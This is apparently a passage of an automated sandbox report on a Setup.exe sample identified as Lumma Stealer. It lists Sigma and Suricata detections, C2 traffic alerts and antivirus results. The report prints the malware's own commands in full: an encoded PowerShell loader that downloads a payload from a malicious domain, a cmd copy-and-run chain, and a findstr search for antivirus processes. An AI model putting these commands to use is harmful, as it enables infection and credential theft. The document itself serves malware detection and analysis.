BsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABs
      Sigma detected: Suspicious Encoded PowerShell Command Line
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABs
      Sigma detected: Suspicious PowerShell Encoded Command Patterns
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABs
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Attachment.com X, ParentImage: C:\Users\user\AppData\Local\Temp\189943\Attachment.com, ParentProcessId: 7924, ParentProcessName: Attachment.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", ProcessId: 7736, ProcessName: powershell.exe
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Attachment.com X, ParentImage: C:\Users\user\AppData\Local\Temp\189943\Attachment.com, ParentProcessId: 7924, ParentProcessName: Attachment.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", ProcessId: 7736, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Attachment.com X, ParentImage: C:\Users\user\AppData\Local\Temp\189943\Attachment.com, ParentProcessId: 7924, ParentProcessName: Attachment.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", ProcessId: 7736, ProcessName: powershell.exe
      Sigma detected: Suspicious Copy From or To System Directory
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7664, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmd, ProcessId: 7708, ProcessName: cmd.exe
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Attachment.com X, ParentImage: C:\Users\user\AppData\Local\Temp\189943\Attachment.com, ParentProcessId: 7924, ParentProcessName: Attachment.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1", ProcessId: 7736, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7828, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-08T01:46:02.055856+010020283713Unknown Traffic192.168.2.449869104.21.36.51443TCP
      2024-12-08T01:46:04.543705+010020283713Unknown Traffic192.168.2.449878104.21.36.51443TCP
      2024-12-08T01:46:07.010162+010020283713Unknown Traffic192.168.2.449885104.21.36.51443TCP
      2024-12-08T01:46:09.186930+010020283713Unknown Traffic192.168.2.449891104.21.36.51443TCP
      2024-12-08T01:46:11.378177+010020283713Unknown Traffic192.168.2.449897104.21.36.51443TCP
      2024-12-08T01:46:13.971378+010020283713Unknown Traffic192.168.2.449902104.21.36.51443TCP
      2024-12-08T01:46:16.219501+010020283713Unknown Traffic192.168.2.449908104.21.36.51443TCP
      2024-12-08T01:46:18.586208+010020283713Unknown Traffic192.168.2.449915104.21.36.51443TCP
      2024-12-08T01:46:20.603874+010020283713Unknown Traffic192.168.2.449920104.21.36.51443TCP
      2024-12-08T01:46:22.813737+010020283713Unknown Traffic192.168.2.449926104.20.4.235443TCP
      2024-12-08T01:46:25.362993+010020283713Unknown Traffic192.168.2.449933104.21.26.127443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-08T01:46:03.213487+010020546531A Network Trojan was detected192.168.2.449869104.21.36.51443TCP
      2024-12-08T01:46:05.391543+010020546531A Network Trojan was detected192.168.2.449878104.21.36.51443TCP
      2024-12-08T01:46:21.457500+010020546531A Network Trojan was detected192.168.2.449920104.21.36.51443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-08T01:46:03.213487+010020498361A Network Trojan was detected192.168.2.449869104.21.36.51443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-08T01:46:05.391543+010020498121A Network Trojan was detected192.168.2.449878104.21.36.51443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-08T01:46:26.021625+010020250111A Network Trojan was detected104.21.26.127443192.168.2.449933TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-08T01:46:19.376501+010020480941Malware Command and Control Activity Detected192.168.2.449915104.21.36.51443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: https://klipcatepiu0.shop/int_clp_sha.txtAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: Setup.exeReversingLabs: Detection: 23%
      Source: Setup.exeVirustotal: Detection: 30%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.8% probability
      Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49869 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49878 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49885 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49891 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49897 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49902 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49915 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.36.51:443 -> 192.168.2.4:49920 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49926 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.26.127:443 -> 192.168.2.4:49933 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.4:49949 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.4:49959 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.4:49970 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.26.127:443 -> 192.168.2.4:49979 version: TLS 1.2
      Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\189943Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\189943\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49878 -> 104.21.36.51:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49878 -> 104.21.36.51:443
